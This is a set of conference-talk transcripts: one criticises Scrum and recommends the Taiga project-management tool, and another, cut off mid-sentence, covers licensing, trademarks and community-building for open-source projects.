But beside the name, even if Scrum called it the foobar meeting or whatever, the very idea that your entire development team gets together at a fixed time every single day of the week to discuss these things strikes me as positively anachronistic. It was fine, I guess, in 1995 when people could generally be expected to work out of the same office when development teams were rather geographically closely located. But I think it's completely out of this world in 2016 when the default is that software development teams are geographically distributed. Some of them may work in offices. Some might not. Okay. We have excellent video conferencing technology at this point. So we might actually use the physical meeting and translate it into something that is virtual. But people work in different time zones. People work based on their own way of basically chunking up the day into work time and family time and so forth. The idea for everyone to get together in a 15 meeting at the same time that is somehow compatible with all time zones, I don't see how that works. I have a colleague who works in Brazil. If we need to get together on a conference call with a customer in Australia, that's almost impossible to schedule, even if it's just for 15 minutes. Try doing that every single day. That's not going to work too well. Another thing, this is not expressly stipulated in the scrum guide or anywhere else, but it's something that strikes me as relatively typical of organizations that are attempting to practice scrum. You might have garnered at this point that I don't really believe actually implementing scrum is physically possible, but at least a few or a lot of organizations try to, is the thing that your planning generally covers the current sprint. You have basically short-term planning, that's your daily work, and then you've got your sprint, and that's about all the definitive planning that you're doing. Beyond that, you have a product backlog. The product backlog is prioritized, so you know in which order you're going to be doing certain things, but you don't really know, and you also know when your next sprint is going to be, but you don't really know, okay, what are we going to do the next sprint? What are we going to do the sprint after that? That's kind of, you can't do that. Now, okay, fine, this might work. In my humble opinion, it will likely only work if the number of customers that you have is zero. Customers are users, it doesn't really matter, but people will want to have some sort of information when they can expect certain functionality or certain features. Now, people are generally fine with understanding that software schedules tend to slip, and that these, unless you're actually dumb enough to make a binding commitment, but if you're just saying, okay, we're expecting this feature to land by time x or by release x, which is expected at time x, people are generally willing to understand that these estimates are to some extent tentative, because you might be running into certain issues, you might be running into bugs, certain things might take priority and so forth. But having no planning at all is something that has also been described as just being dangerously short term. You generally tend to lose sight of the big picture, if the only thing that you're really caring about is your sprint and nothing beyond that. Now, I'm not going to argue that something akin to what we're doing in scrum development isn't reasonable under certain circumstances. 
For example, a method like scrum, it's not going to be scrum, but a method like that where a team comes together, elects not so much a leader but a spokesperson, and then just starts hammering away at a task, that's something that's entirely reasonable for emergency situations. And I don't necessarily mean life threatening emergencies, it may be something like, okay, if we don't ship this by time x, our next funding round doesn't come in, right? Or something like that. So under those circumstances, I think it's perfectly reasonable to use an approach like, okay, we're going to get together, we're going to elect a spokesperson, we're going to divvy up our work, and we're going to start rolling. And then importantly, when it's done, we go back to our usual mode of operation. And if you're using a development method that is reasonable for emergencies all the time, that basically means that we're acting as if our company was always in an emergency. If your team is permanently operating in emergency mode, you need to quit. And it doesn't really matter which side you're on, if you are basically a developer on that team, then you need to get out of there because you're in a really bad place and it's only going to get worse for you. And if you're someone who actually imposes this method on the team, then you're doing something even worse because you are basically burning your people out. That's not something you want to do. By the way, just for the sake of completeness, specifically in large corporations, if you are up at the CEO or CXO level, it's relatively common that those people are going to spend most of their time fighting some sort of fire, responding to some emergency in the original sense, something that has just emerged that they need to react to, fine, but it's not something that should trickle down all the way and should not govern your entire company. One thing that Scrum advocates, and I'm not going to ask for raised hands for Scrum advocates here, one thing that Scrum advocates frequently tend to say or put forward in favor of Scrum or in defense of Scrum, or for that matter, really in the defense of Agile, is that they're saying the waterfall method is bad and Scrum, insert Agile here if you want to, is novel. Scrum is kind of like a manna from heaven that finally sets us free from waterfall. This is almost like a bit of a strawman, and it's also not true. And the whole novel thing isn't true, and it hasn't been novel since about 1975. If you are in any kind of software development or engineering role, if you have not read this book, you've made a big mistake. You really should. It's a classic. It's Fred Brooks' Mythical Man Month, essays on software engineering. It originally came out in 1975. It had a 10th anniversary and a 20th anniversary edition where additional content was added, but what he said back then was, waterfall is a terrible idea. And in fact, guess what he proposed? He proposed a model of iterative development. He basically said, what you should be starting out with is a piece of program, as it was called at the time, right? We're talking about programs because we're programming from mainframes at the time. But basically he said, you should start out with a program that perfectly does nothing, right? That's perfectly fine at doing nothing, and then you add features iteratively, and you always continuously have a working program. Now at the time, he called this the spiral model of development. 
Since then, that term has slightly shifted, so that's why I'm not referring to this model as the spiral model, because now you're thinking of the spiral model as something slightly different, which is a risk-based development method, where you have a certain set of features, and now you're thinking about changing these, and then you try to assess what's the risk that's associated with this. It's a very, very defensive effort. So the meaning of that has changed a little bit. But if you want to look at iterative software development, you really don't have to go to 2005 or 1995. That's an old hat. That's something that goes back much longer. And so to present Scrum as the antithesis to waterfall, that's just, yeah, okay, you're comparing it to something that we all know is terribly imperfect anyway. Something that I think is particularly toxic about Scrum is that Scrum advocates frequently tend to argue along these lines, which is: if the Scrum method doesn't work for your team, your problem is your team. You should be firing some of your people, and you should be hiring people that are better at doing Scrum. I firmly hold this to be untrue. If Scrum doesn't work with your team, your problem is Scrum, not your team. And what you need to change is the way that you're doing your development method, and not necessarily the people on your team. A corollary to that, or something that you frequently find in the same vein, is: if Scrum miserably fails to deliver results in your organization, it's because you're doing it wrong. I don't think that's true; I think this would only happen if you're doing it right. I don't think this is possible, mind you. I don't think it is possible in an organization to implement Scrum by its own definition, which means with all the rules, roles, artifacts, and events completely unchanged. I don't think that you can really do that. But if anyone were to do it, I think it would certainly lead to disaster, and straight into it. So here's my first message. Please just don't be a scrumbag. Try to not be a scrumbag. If you were one at some point, here's a rehab for recovering scrumbags. Because it turns out there are certain things that we find in Scrum and Agile and so forth that are actually reasonable. Now mind you, I'm not going to argue for any of this as doing Scrum half-assed, because by its own definition, you cannot do that. So what I'm talking about is certainly not Scrum, but there are certain things that we can salvage out of what Scrum postulates. And you know, salvaging things is not necessarily a bad thing. Sometimes you can go through a pile of rubble in a landfill and find some really, really valuable things. So this is the Atari game dig in New Mexico in 2014. Atari in the early 80s dumped a bunch of game cartridges for games that didn't sell, just basically buried them in the ground. And now of course some of these cartridges are worth hundreds of dollars. So they dug those up, and they got a special permit for them to dig those up. And there are several Atari 2600 cartridges of E.T. the Extra-Terrestrial, which they dug up from this landfill. So there's one thing that I personally actually think is a reasonably good thing in Scrum, even if it's not very adequately named. A product backlog; a backlog is something that's sort of akin to a traffic jam. It's an impediment to movement.
So it's like it's a little weird as far as the naming is concerned, but the very idea that you have a transparent list of things that your product should at some point do and then be able to prioritize that. So you know, okay, this is what's more important than this other thing, provided that you actually take an order of priorities that ranks things that are important higher than those that are urgent. I think a product backlog is absolutely reasonable to have. Simply keeping track of all the things that you want the product eventually to do is a perfectly fine thing to do. Sprints, well, kind of useful. So here's a few things that I've already mentioned this that I think are really terrible about sprints. One, we're only planning in the current sprint. We're not looking any further. Two, we are not really worrying about anything that is further on down the road. Three, every sprint immediately follows the next sprint. So the way I do it with my development team is, number one, we have our product backlog. We have the immediate next sprint and we use typically a two-week period, sometimes a one-month period for that. And so we know when our current sprint is, when our next sprint is going to be, when our next sprint is going to be. What we do now is we put down all the items, all the user stories, the product backlog items that we want to do on our current sprint and then on future sprints. And everyone on the team understands that only the current sprint is binding, only the sprint task board for the current sprint is binding and everything else is completely tentative and is subject to change. So what does that give you? That gives you a bit of a better overview of where we're going. And we're losing this completely short-term focus and we can look out a little further. And also, and I think this is just a reality and a fact of life, it is perfectly fine in a project to have a hiatus. It's perfectly okay to have a sprint that is followed by a break. And then a couple of weeks later, you pick up the next sprint. Remember this is not scrum because in scrum you cannot do this. In scrum explicitly in every project you have sprint after sprint after sprint after sprint. So I think the concept of sprints is kind of reasonable. It's something that you can use, albeit in a very modified fashion. The next thing, story points. So in one admirable thing that scrum tends to do or tends to want to do is rather than assigning a measure of this is going to take such and such effort or worse still, this is going to take so and so many person days. Remember read up on Brooks mythical man month. In 1975 he wrote the man month is a dangerous and deceptive myth for men and months are not interchangeable. That was the exact quote in 1975. So what scrum tries to do is it tries to assign an abstract measure of complexity. Some teams tend to use the term bananas for that. So a user story is so and so many bananas or whatever you come up with. Really enough scrum doesn't really say anything about perhaps renaming your story points. Maybe that's legit actually. And so the idea is that you have sort of this abstract measure of complexity and then you figure out via your burn down like into what time that translates. So you've got so and so many bananas and you're burning so and so many bananas per sprint. And so then you get this abstract measure of complexity. 
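To make the burn-rate arithmetic described above a bit more concrete, here is a minimal Python sketch of translating an abstract complexity measure into calendar time. All numbers and names are made up for illustration; they are not taken from the talk or from any particular tool.

```python
import math

# Illustrative only: translating abstract complexity ("bananas") into time
# via an observed burn rate. All numbers are hypothetical.
backlog_bananas = 120        # summed estimates of everything still on the backlog
bananas_per_sprint = 18      # velocity observed over the last few sprints
sprint_length_weeks = 2

sprints_needed = math.ceil(backlog_bananas / bananas_per_sprint)
print(f"Roughly {sprints_needed} sprints, about "
      f"{sprints_needed * sprint_length_weeks} weeks of work")
# -> Roughly 7 sprints, about 14 weeks of work
```

The point is only that the abstract unit never stands on its own; it is always interpreted through the team's measured burn rate.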
Now again this in my humble opinion is something that self explanatory only works if your team is stable because only if your team stable will it eventually converge on a reasonably accurate measure of complexity across teams. And I really think this is far inferior to a different approach which is and believe me this is a complete scrum no no is to actually take your user story and break it down into tasks and my degree of granularity that I think is makes the most sense to me is the most reasonable to me is break it down into a granularity such that the tasks in your user story could at least in theory be done by a single person. So basically you have tasks in there that are that do not require splitting up anymore and then what you can do is you can have people basically estimate the complexity of those tasks separately and then you can add them up. Again like I said an agile practitioner will say no no no no is a terrible idea because what the team should do is it should take an arbitrarily complex user story and should somehow come up with a measure of complexity for the whole thing by consensus. I think that's a really really terrible idea and I think that breaking it down into individual manageable tasks and then estimating those separately and adding them up is something that simply works way better for human nature. So my personal verdict on story points and by the way you know by all means feel free to disagree with me on this one is story points are useful to an extent not a whole lot but a bit. There's one thing that's related to story points that I think is patently ludicrous and that's the idea of planning poker right. So the idea of planning poker is that when you have when the team comes together and it's expected to assess the complexity of the user story by consensus you have this concept of anchoring where whoever says any kind of value first that's what everyone else is going to be calibrated against right. So let's say for example we have a certain task which someone estimates to be 20 bananas but the first person talking says five and they say well maybe I was a little high on that if I make it double the estimate of the other person we should kind of sort of be okay and then they say 10 and in reality you find out it's more like 22 and you would have been right in the first place if it were not for this anchoring thing and so the idea is that you get this deck of cards and you put down everyone selects their estimate puts it face down and then you turn it up all at the same time. I think if you're thinking that that makes any difference you're just completely lying to yourself because eventually the discussion is going to ensue and then you have the exact same anchoring problem again which is what happens if you've got three people in this area of like so and so many story points and you've got one person who is like well below is that just the person who is more competent who knows and understands a shortcut and correctly estimates that it's actually not as complex or is it a person who is just overly optimistic right? I don't think that planning poker really adds anything to the whole thing so for me that's a clear no. So like I said there are certain things that in my humble opinion you can take out of the postulates of scrum that you can and perhaps should do but it's definitely not scrum at all by its own definition and scrum by its own definition really needs to go out the window. 
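As a small illustration of the task-level estimation argued for above, here is a hedged Python sketch: break a user story into tasks small enough for a single person, estimate each task separately, and sum the estimates. The task names and numbers are invented for the example.

```python
# Hypothetical user story broken into single-person tasks,
# each with its own complexity estimate in abstract units ("bananas").
tasks = {
    "write database migration": 3,
    "extend REST endpoint": 5,
    "add integration tests": 3,
    "update documentation": 2,
}

story_estimate = sum(tasks.values())
print(f"Story estimate: {story_estimate} bananas")  # -> Story estimate: 13 bananas
```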
Now, this being a technology conference, of course, what would I do if I wouldn't also talk about tools? So what we did in our own development team was we looked at, you know, there's a bunch of agile or agile-ish project management tools out there. We looked at a few of those and we calibrated them against sort of our way of managing our development projects, to see how well they were suitable for that. Among the tools that we looked at were Asana, Trello, and there's an agile mode for Jira. We found all of those to be lacking in one way or another, and we eventually settled on a tool which some of you may know, some of you may not. Who in here has heard of Taiga? One? Okay, I'm here for a reason. Good. So Taiga defines itself as a project management framework with Scrum in mind. So it doesn't say it's Scrum, it just says with Scrum in mind, and it's a particularly useful tool. It's something that you can get as a service. It comes out of a company from Argentina and it has a handful of tools that you will find quite reasonable and useful. So for example, this is just a regular project dashboard where you basically get an overview of the projects that you're currently a part of, the things that you're working on, whether those are tasks or issues or something else. That's reasonably useful. One thing that I particularly like about Taiga is the fact that, number one, it supports GitHub login. That's always helpful, so you don't need a separate login there. It also has very, very good GitHub integration. So for example, you can do certain things like updating the status of a user story via a GitHub commit message in Git. Those things are kind of useful. But one thing that I think is particularly neat is that you have development teams that are per project, and you can bring externals in on individual development teams. So specifically if you're contracting out some of your software development, this can be very, very helpful, where effectively, whether you're contracting out or being contracted for software development, you can, for example, bring in your customer as a product owner, if you want to use that terminology, right? Which is what we're doing, for example, here with the Cloudify course, that's for one of our customers, Gigaspaces. And we're bringing some of their team on effectively as product owners and people on the team. You also get, you know, if you like burndown charts, you do get a burndown chart. You do get a task list and so on. And of course, you also get user stories that you can then break down into tasks. You can add attachments. You can add comments and so forth. And there's something that I think is particularly cool about Taiga, and that is this thing, this is relatively new to Taiga. They call it Taiga Tribe. And you can effectively define a user story and you can then contract it out if you want to. You can post it as a gig on Taiga Tribe and then you get connected to a developer who might be suited for doing that, and then you can basically contract a job out on a one-off basis and then hopefully actually establish a relationship with that person. So if you're a hiring manager, that may be a good way to find talent as well. And best of all, and I wouldn't be talking about Taiga if it wasn't this, it's all open source. So it's not one of those things that you can only run as a service and whatnot. You can self-host this thing. It's under the Affero GPL v3. All the code is up on GitHub.
You can go to github.com/taigaio and it's everything. It's the front end, the back end, the APIs, everything's up on GitHub and is under the AGPL license, and they're also eating their own dog food. So they have their own user stories for Taiga in Taiga as public projects. So you can effectively follow their development transparently. If you do go, by the way, with the hosted version, it's currently, and I don't think they have any intention to change that, free for all public projects. So if you do the same thing that they're doing with their project, which is make everything public for everyone to see, that's for free. And only if you have private projects that people who are not on the team cannot see, those are what you pay for. Of course, unless you self-host, in which case you can roll this out on your own server, and it's actually pretty cool stuff and it's something that you might want to look into if this is something that interests you. Just in case you're curious, what have we used this for? What have we built with this? And you'll see that effectively we're using this for something that is pretty much straight-up software development, but we're also using it for something that is more on the DevOps side of things. We run a learning management system called academy.hastexo.com. We are originally a professional services company that offered and did a lot of face-to-face in-person training on things like Ceph and OpenStack and distributed technology and so forth. And what we wanted to achieve is we wanted to do all of this in what we call SPOT, self-paced online training. So basically the idea is that you can log on to this thing and you get your own Ceph cluster to play with and you run through a series of hands-on labs and exercises and so forth, and it basically takes you from zero, effectively having blank servers, to having, say, for example, a fully working OpenStack cluster or a fully working Ceph cluster and so on. If you're curious, you can certainly visit us at academy.hastexo.com to see that. So we manage that, we manage effectively the iterative development of our own learning management system platform, which by the way is based on Open edX, with Taiga and with this development management method. We also do the same thing for a full integration of the Open edX learning management system stack and OpenStack. So we worked on making Open edX work on any OpenStack cloud, so if you're in any way interested in learning management systems and running those on private or public clouds, that's something that you might be interested in as well. And this also includes interacting with OpenStack through these on-demand lab environments, where effectively we can point our system at any OpenStack private or public cloud to fire up these arbitrarily complex distributed systems for labs as learners need them. And finally, what we had to do in order to do that is make some contributions to Open edX itself. Open edX has a plug-in system, and those plug-ins are called Open edX XBlocks. We wrote a couple of those. Those are up on GitHub, they're open source, they're public, and also the Taiga project boards for those are public as well. And we use that just the same. It's a development approach that we have been using for just under a year and a half now. It's something that we're quite happy with. Maybe it's something that you want to consider. Before I take questions, I'll be happy to share these slides. All my slide decks are normally under a Creative Commons Attribution-ShareAlike license.
So if you want to use these, modify them, whatever, you're certainly free to do so. And the slides are at github.io slash fjhaz slash frostcon 2016. Those are the ones, those are actually the sources for the slides. If you want to go to the slides directly, they're here. If you want to grab these, and those should work fine on your phone and so forth as well. Okay, with that, I thank you for now and then I'll be happy to take questions. What's your reasoning for saying that if you keep a prioritized backlog and only plan for one sprint in detail, you cannot keep a big picture in mind? So this is not so much a challenge for the development team. So if you have a smart development team, and by definition normally you do, they will have a fairly good understanding of, okay, this is what the backlog looks like, this is the priority list and so forth. But how do you communicate that to your customers and your users? If you don't care about that at all, which in my humble opinion you can only do if you have zero of them, then you don't mind that either. But I think it's very important to have at least a rough idea of this is going to land, this is going to complete or will be finished in about such and such timeframe. But again, that's just my opinion and by all means please feel free to disagree. Yes, sir? Yeah, but you have the product owner for that. If you really do scrum, your team isn't supposed to talk to your customers. That's the product owner's task. Not that I find that good. Yeah, no, I mean, yeah, fine. So of course, yes, your team isn't going to talk, but where does the product owner get their information from? The only thing that they do is basically a backlog and they're not allowed to put anything on a future sprint either. Yeah, but they can put stuff in the backlog. They're allowed to do that within scrum. Like I said, I mean the only thing that you can actually tell people is you can effectively make relative statements. Well, you can make the absolute statement of we are going to do that or we're not going to do that. You know, you could of course say, okay, no, this is completely out of scope. Don't hold your breath. This is never going to happen. And you can say, okay, so we're going to do this, but not until this other thing is done. So basically you can tell someone, well, come back after X is done so we can talk about Y, but that's about it. Well, there are releases. I have no idea if that's scrum plus already or if that's in the original scrum, but you have to do it. Either way. Okay. I saw a hand over here. No, over there. Okay, you said you don't care about the planning poker that much at all, but to say story points can be important in a way at least maybe for burned on, but it cannot, at least for me, I would say you cannot have story points without the planning poker. I think you can have story points by actually having at least a tentative breakdown into tasks. If you can't break a user story into tasks to the point that you can act, you can, you can define your task as being manageable by one person, then most probably what you're thinking about is too complex for a user story anyway. You basically have to break it down some, right? And if you are able to effectively say, all right, so here are these individual tasks and you can now effectively estimate the complexity of these individual tasks and then add them up. But who estimates? What is that? But who estimates the task in this case? The team. 
Ideally, ideally, if you can break it down to like a single person and you perhaps actually have a person in mind who might be the qualified expert to do this, by the way, again, this is something that in Scrum is a big no-no because in Scrum everyone's a developer, right? This by the way, that's another, it's explicitly mentioned in the Scrum guide is that within the team there is only one role that is acceptable and that role is developer and it explicitly says, semi-colon, there are no exception to this rule, period. So if you work on a team that claims to use Scrum and your business cards is anything other than developer, no Scrum. Just so you know. And so like I said, you know, what Scrum does is that like pretty much everyone's equals and no one's a specialist and of course, well, if that's what it is, then you can't reasonably get to the point of, okay, let's break this down. Let's talk to this person. He or she is the expert for exactly that thing and he or she is going to be able to tell us, okay, this is about the estimate that we can do. And of course, that person is probably not going to be quite as specialized in something else that their colleague is qualified to do. So like I said, this whole idea of, you know, let's somehow draw an estimate for a user story, complexity estimate for a user story out of thin air. For me, it just completely doesn't make sense, but perhaps that's just how my brains wired. I've never seen a team which could say what complexity of a story is. So yeah, so that's the comment was exactly what I mentioned. It's fundamentally impossible almost for a team to just basically dish out a complexity estimate along a Fibonacci series, of course, right? Because we're not doing anything else there. So I think that's a good answer. A lot of people suggest scrum is a good method for startups. But from what you've just told us, it sounds like a very terrible idea because in startups, you nearly never have a stable team. So what would be your point on this? I agree. Next question. So you agree that's a terrible idea. I really think it is a terrible idea. Yes, I think that the idea of expecting out of a team to somehow magically organize itself while it is constantly changing is ludicrous. It's an entirely unrealistic expectation. I was just curious because it's suggested so often on the internet. So scrum is the most suggested thing for startups. If the internet would have been around at about maybe 200 AD, it would be full of statements saying that the sun revolves around the earth. So the appeal to majority never really works actually. We had the gentleman in the bright green shirt up here. I've heard once that you should look at scrum as a framework of tools. You should just pick the tools you like and use them how you like and fill it in as you like and not let scrum master your process but use scrum as a tool in your process. You are perfectly free to do that within the very limited freedom that scrum allows you. So for example, you can organize your daily scrum in any way that you want. You could for example put out the rule that everyone has to stand on their chairs or something or that everyone has to come in red t-shirts but it has to be daily and it has to be 15 minutes. So yes, it is a framework but it's a relatively rigid one. I guess you could call a full body cast a framework but it doesn't allow you a lot of flexibility and a lot of movement. 
Because I guess the way we use Scrum as a company, I guess you wouldn't call it Scrum because it doesn't obey the strict rules. Okay. Don't be a scrumbag. Yes sir. So with the Scrum bashing that's going on here, it's like, okay, you have to stick to the rules and switch off your brain. Come on, it's a set of guidelines. Use your brain and act accordingly. Right. But stick to the rules: who does that? I've never seen this. Right. Fair enough. And what does that say about a method that explicitly says you must stick to these rules, otherwise you're not doing it? I'm sorry, that's just not a method. There, I agree. Okay. All right. Thank you very much. That was, well, I'll be happy to take questions later on. Okay. Thanks for coming. That was great. Thank you. All right.
|
Anyone doing any kind of Agile development has heard of or practiced Scrum, which has become a favorite among development managers. In reality, Scrum is a scourge, not a boon, and it's time to understand that the emperor is naked.
|
10.5446/32430 (DOI)
|
So, our next presentation covers all the complex, or maybe not so complex, tasks that open source projects face beyond pure code, and I'm very happy to introduce Isabel for the presentation; please give a warm round of applause for her. Okay, good morning. I'm going to continue in English because I know at least one person here doesn't speak German well enough to follow the presentation. If you don't speak English, sorry. So this is going to be about open source and how it's not just about source. Why am I going to tell you something about what open source is all about? I'm a software engineer at Elasticsearch. We do lots of open source. We've got Logstash, we've got Kibana, we've got Beats and Elasticsearch Core, of course, which are all Apache licensed. Apart from that, I happen to be a director of the Apache Software Foundation. I'm co-founder of Apache Mahout. Would you raise your hand if you know the project? One, two, three. I want to talk to you about why you know it after the presentation. Apart from that, I'm co-founder of Berlin Buzzwords. It's a conference on all things scalable and storage, which happens in Berlin. So if you need an excuse to make your employer pay for a trip in June, like sunny, nice, to Berlin, go to this conference. Okay. In order to wake you up, how many of you are running your own open source project? A little more than half, okay. How many of you have ever contributed? Pretty nearly everyone, okay. Speaking of contributions, anyone who wrote about an open source project in their blogs, publications, press articles, whatever? Okay. Good. Did you ever help other users getting started with open source? Come on, I want to see your hands. I don't do this meetup trick of handing out microphones and asking questions. Okay. Nice. Nearly everyone. How many of you are using open source in your day job? Keep your hands up if you contribute to open source as part of your day job. Maybe half of everyone, in that kind of range. Okay. How many of you are using open source in your spare time? Yes. Nearly everyone. Good. Okay. So why should all of you care about what open source is about, apart from the technology behind it? Let me tell you a story. So I convinced my mom to use Ubuntu several years ago. She remembers this user interface that they used very early on and then switched to Unity, which looked completely different. That totally screwed up my mom. It totally would. So she's not the only one. Awesome. She's also a fan of Shotwell. So after missing a few upgrade cycles, we suddenly had to go from one version to the other, except the database schema wasn't compatible anymore. I was really, really happy to have my husband to dig through these database entries and convert to the new schema, jumping several versions. So it was one day lost, mom is still happy. And I'm happy that I have my husband who can do that. So if you do use open source in your spare time, you definitely want to know how it works so that you can talk to the right people in order to fix your problems, or so that you can fix these problems yourself. I've seen quite a few of you who are using open source as part of your day job. Essentially this boils down to betting your business on an external dependency. What happens if this project stops receiving any security updates? What if you need a tiny little change to the project to make it work for you but you don't have the time and skills to do that yourself?
Can you motivate the project to do it, or can you motivate a consultant to do that for you? And what happens to this patch afterwards? How does it get applied to upcoming new versions? So I would suggest that even if you're not building open source yourself but only using it, you still want to understand how these projects work if you're betting your business on it, so you know what's going on. Last but not least, I've seen a few of you who have raised your hands when I asked whether you run an open source project. When you get started, coding probably is like the topmost thing you want to do and you want to focus on. There are a few things to keep in mind even when you start out. The first thing that you want to think about when starting an open source project, in my personal opinion, is to think about what your goals are with doing that. Do you want to build a business around that software that breaks into an existing market by changing the economics? That goal might have an influence on your decision with respect to licensing, for instance. Do you want to collaborate with others who have the same need as yourself, to fix the problems that you have and that others may have, so that you don't have to do all the work? That may require a different community model, for instance. Or do you simply just want to build up your CV, do you want to build up your reputation and skillset? That also may decide how you run your project. Essentially, it boils down to: how much control do you want to exercise personally, versus how robust should that project be? If you want to build a company around that project, my personal take would be that you probably want to control the direction of that project. If that at some point is supposed to be your product, you don't want to give up that control. If however this is like, I want to build that thing, but I want to collaborate with others to build something that's bigger than what I could achieve, then you would want to think about how robust that project should be, how easy it should be for people to contribute and how interesting it should be for people to contribute. Okay. Now, what factors do I think about that are not code? Let's go for the easy ones. These are just the legal ones. You want to think about copyright, patents, and you want to think about trademarks. Let's focus on copyright first because this is like kind of sort of trivial. This is inspired by a post that was published at gnu.org. Essentially what you want to decide first is: do I care about any and all of my downstream users, including those that use derivative versions of my software? In that case, you go for a copyleft open source license. If you do libraries, especially if there are other libraries around that do similar stuff, go for the LGPL so that people decide to use your library. If you go for server software, there's a huge wealth of discussion around the AGPL, but if you go for stuff that's going to be hosted somewhere anyway, where users typically won't run it on their own, you want to at least take a look at the AGPL. Maybe that's something for you. For everything else, go for the GPL and you're pretty much set to go. The other option is: I only want to ensure that those users get the four freedoms who use my very own project. That's the ideal case for a non-copyleft license.
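As a compact restatement of the copyleft decision path just described (the non-copyleft cases are elaborated right below), here is a tiny Python sketch. The function and its parameters are invented for illustration, and none of this is legal advice.

```python
def suggest_license(cares_about_all_downstream_users: bool,
                    is_library: bool = False,
                    is_server_software: bool = False) -> str:
    """Restates the rules of thumb from the talk; illustrative only, not legal advice."""
    if cares_about_all_downstream_users:
        # Copyleft family: you care about users of derivative versions too.
        if is_library:
            return "LGPL"    # libraries, especially where similar libraries already exist
        if is_server_software:
            return "AGPL"    # hosted software that users typically never run themselves
        return "GPL"         # everything else
    # Non-copyleft family: tiny projects, standards you want to spread,
    # or projects meant to change established market economics.
    return "a permissive license such as the Apache License"

print(suggest_license(True, is_server_software=True))   # -> AGPL
print(suggest_license(False))                            # -> a permissive license ...
```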
When you have something like that, if you build something that's teeny-tinyish and you don't care about license enforcement anyway, go for non-copyleft to begin with, because if you don't enforce it, there's no real reason. If you have a library that pushes a standard forward that's near and dear to your heart but which isn't widespread yet, go for some non-copyleft license. Again, if you want to have a project that changes established economics, non-copyleft, especially, say, the Apache Software License, is well established among businesses. If you want to drive some competitor out of the market, my personal choice would be non-copyleft, probably Apache licensed. So much for the easy stuff. Software patents: sorry, I'm not going down this rabbit hole. If you want to talk software patents, go out there, there's the FFII booth, they do great work countering software patents; ask them about what this is all about. Trademarks: why should you care about trademarks? First of all, what makes a good non-infringing project name? When you build your first open source project, you don't want a company to go after you because you're infringing their trademark. Even worse, you don't want another open source project going after you for infringing their project name. So there's a little anecdote: how many of you know the name Hadoop? Keep your hands up if you know the story behind it. The story behind it is that the child of the project's founder had a little stuffed toy elephant that was called Hadoop. Doug Cutting once coined the insight that children are very good at coming up with non-infringing project names. So that's how Hadoop came into existence. It's also how Nutch got its name: if you're searching for an internet-scale search engine, which nowadays is more like a crawler, an internet crawler, go and have a look at Nutch. Nutch used to be the first word that this project founder's child ever said. So if you have children, make a little note of all the words that they invent. Might be useful one day. Okay, now you've got a non-infringing, great name. Why should you continue to care? Well, only if you really take care of your trademark does it remain a trademark, or if you register it. So you have to decide if it's okay for people to sell copies of your software on eBay without mentioning where that software actually comes from, like without attribution. It's typically not a good thing. You also need to take decisions like: is it okay for a fish pedicure company to use a logo similar to yours? That one over there actually was created. Okay, you have to take decisions on whether you should register your trademark or not, and you will have to find and counter trademark-infringing uses of your name and logo. What's pretty good for that is to have a Google Alert for your project; it's good to have anyway because people are discussing your project, so it's great to have that feedback on what people are using it for. It's also great for finding people using your trademark for conferences that you are not involved with. It's great for finding products that are using your trademark without having contacted you first. Then you need to identify whether that usage is actually infringing. So if this is a product that's sufficiently similar to your project, so that there could be confusion, it could be infringing, and then you have to actively go out and fight that infringement.
From experience at the Apache Software Foundation, what's usually sufficient is to send a reasonably friendly email to the person or to the marketing department and tell them: this is our trademark policy, you're not following it, please fix it. This is sufficient if you do it often enough. So much for the easy legal stuff. It's just like: easy rules are fine. We're going to go to the slightly messier topic of people aspects. Honestly, I don't believe in the lonely, brilliant hacker. I believe that's a lie. Every one of us who writes great software stands on the shoulders of giants, either reusing software others have built or reusing ideas of others, or even better, collaborating with other people. Also, great software is refined over and over; it's not written once. So I believe that a project without people is a dead project. And a project with a single point of failure when it comes to contributors is pretty high risk. At Apache, we've got the saying of community over code. What's more important: there's nothing more important than having a vital community behind your open source project, because this is what keeps it alive. So what do I mean with people and what do I mean with community? One group of people that should be interesting to you are potential users of your project. Where do you find them? How do you turn them into actual users? And once converted, how do you retain them? So there's a term for that. It's called marketing. How do you do marketing? You go to social media, you tweet about it, you probably use your own hashtag, you use a separate Twitter handle; for Apache Mahout, we have the @ApacheMahout Twitter handle which retweets all interesting news related to Apache Mahout. You search for mentions of your project to find out what people are using it for. You get involved in these discussions to find out more. Why should you do that? First of all, it's good feedback for your development: what are people really interested in? On the other hand, you will come into the situation where people ask you, why should I use this project? What are other people doing with it? At Apache Mahout, we used the 'powered by' wiki page, which was just an alphabetically sorted list of people who admitted to using Apache Mahout, and sometimes they were brave enough to tell us what they were doing with it. This was extremely helpful to answer the question of which people are using your project. What can I do with it? Look at this, those are the real-world use cases. There's also this one instance when I went to an ApacheCon in Amsterdam and heard one of Apache Solr's users talk about what they did with the project. It's typically much more believable, much more approachable, if your downstream users talk about what they do with your project, than you selling it yourself. If you can get some of that information on your project public, that's super nice. At some point, you may want to decide if you want to run your own conference, if your project becomes really, really successful, or you may want to leverage some pre-existing one. There's a couple of things you can do without conferences. You can talk to the press. You can write press announcements and hand them out. I've made very good experiences with talking to Heise people here in Germany. People at Software & Support also usually are open to receiving news that they can publish on their site.
It helps if these press announcements are generally understandable, not just for the hardcore geeks of your project. What you can do as well is that over time, news magazines will come to you asking for guest articles. You can start writing them yourself. You can start reviewing books, if you have the time, in order to know what other people are writing about your project. If you really have lots of time left, you can write your own books, or you can start writing your documentation such that it can be published as a book as well. Speaking of writing books and supporting users: some of your downstream users will be happy reading just through the docs. Many of them won't. Quite a few will prefer going to conferences like FrOSCon here, being told what's new, being told what's interesting. You will end up giving talks at conferences. More important than that, you will probably end up talking to people in the hallway. What I found helpful is to have your presentation at the beginning of a day or at the beginning of the conference even, because that means that people will come to you and ask you questions about your project, because it's easier to remember me standing here than me remembering everyone in the audience. Sorry, I'm pretty good with faces, but not good enough to remember everyone. You may end up standing at a booth answering questions, so just being available. Here at FrOSCon, you should check out the Elasticsearch booth outside. We've got Philip Wilsaus, who's happy to answer any questions and happy to channel all of your rants to the project and company internally. There's another booth by the Apache Software Foundation that you should check out. They've got nice stickers and they can answer all the questions about Apache. Of course, you should also check out the Free Software Foundation booth. These are just my three main favorites and there's many more outside. Okay, over time, you will have to do some kind of support. What does support look like? You will have people just beginning in your project, and you want to mentor them and you want to support them, not just scare them away. There will be questions that come in over and over again that you will have answered already; instead of just telling people to go to the frequently asked questions page, make this frequently asked questions page linkable and link them to the correct question. It's pretty helpful, and anyone searching for the same answer will find the correct and detailed answer without you having to type that up every day. One hint about that is that if your first-time users and beginners are happy, they might one day turn into successful contributors. Are there any students in this room or people dealing with students? Are you aware of the Google Summer of Code internships? One, two, three. So 